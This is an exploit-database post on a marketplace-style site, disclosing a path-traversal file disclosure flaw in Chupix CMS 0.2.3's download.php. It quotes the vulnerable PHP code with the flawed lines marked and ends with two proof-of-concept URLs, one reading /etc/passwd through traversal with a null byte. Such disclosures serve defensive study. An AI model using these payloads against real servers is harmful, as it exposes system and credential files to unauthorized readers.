[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Chupix CMS 0.2.3 (download.php) Remote File Disclosure Vulnerability

Author
GoLd_M
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2139
Category
web applications
Date add
14-09-2007
Platform
unsorted
====================================================================
Chupix CMS 0.2.3 (download.php) Remote File Disclosure Vulnerability
====================================================================



# Chupix CMS 0.2.3 (download.php) Remote File Download Vulnerability
################################download.php################################
Lain:18->57 ->
********************************************************************************************************************
if(isset($_GET['fichier'])){ <--------------XXXX                             
                                       *
		// telechargement du fichier                                               
                         *
		$file = "archives/". $_GET['repertoire'] ."/". 
$_GET['fichier'];<--------------XXXX                *
		$fichier_txt = "archives/". $_GET['repertoire'] ."/cpt/". $_GET['fichier'] 
.".php"                 *
		$repertoire = "archives/". $_GET['repertoire'] ."/cpt/";                   
                         *
		if(is_file($fichier_txt)){                                                 
                         *
			$fp           =   @fopen($fichier_txt, "r");  <--------------XXXX         
                  *
			$result       =   fread($fp, filesize ($fichier_txt));                    
                  *
			fclose($fp);                                                              
                  *
			$result       =   str_replace("<?php ", "", $result);                     
                  *
			$result       =   str_replace("?>", "", $result);                         
                  *
		                                                                           
                         *
			$num = trim($result);                                                     
                  *
		}else{                                                                     
                         *
			$num = 0;                                                                 
                  *
		}                                                                          
                         *
		$num++;                                                                    
                         *
		                                                                           
                         *
		$msg = "<?php ". $num ." ?>";                                              
                         *
		                                                                           
                         *
		if(!(is_dir($repertoire))){                                                
                         *
			mkdir ($repertoire, 0755);                                                
                  *
		}                                                                          
                         *
		                                                                           
                         *
		$fp  =   @fopen($fichier_txt, "w+");<--------------XXXX                    
                         *
	  	if (flock($fp, LOCK_EX)) { // pose un verrou exclusif                    
                           *
    		fwrite($fp, $msg);                                                     
                             *
   			flock($fp, LOCK_UN); // libere le verrou                               
                     *
		}else{                                                                     
                         *
    		echo "Impossible de verrouiller le fichier <font color=\"maroon\">". 
$fichier ."</font>";          *
		}                                                                          
                         *
   	 	fclose($fp);                                                           
                             *
   	                               	                                         
                                   *                                         
                                                           *
   	 	                                                                       
                             *
		                                                                           
                         *
		header("Content-type: application/force-download");                        
                         *
		header("Content-Disposition: attachment; filename=".$_GET['fichier']);     
                         *
		readfile($file);<--------------XXXX                                        
                         *
}                                                                            
                                       *
********************************************************************************************************************
# POC:
      /download.php?repertoire=defaut&fichier=../../download.php
      /download.php?fichier=../../../../../../../etc/passwd%00
# Discovered by: GoLd_M



#  0day.today [2024-12-26]  #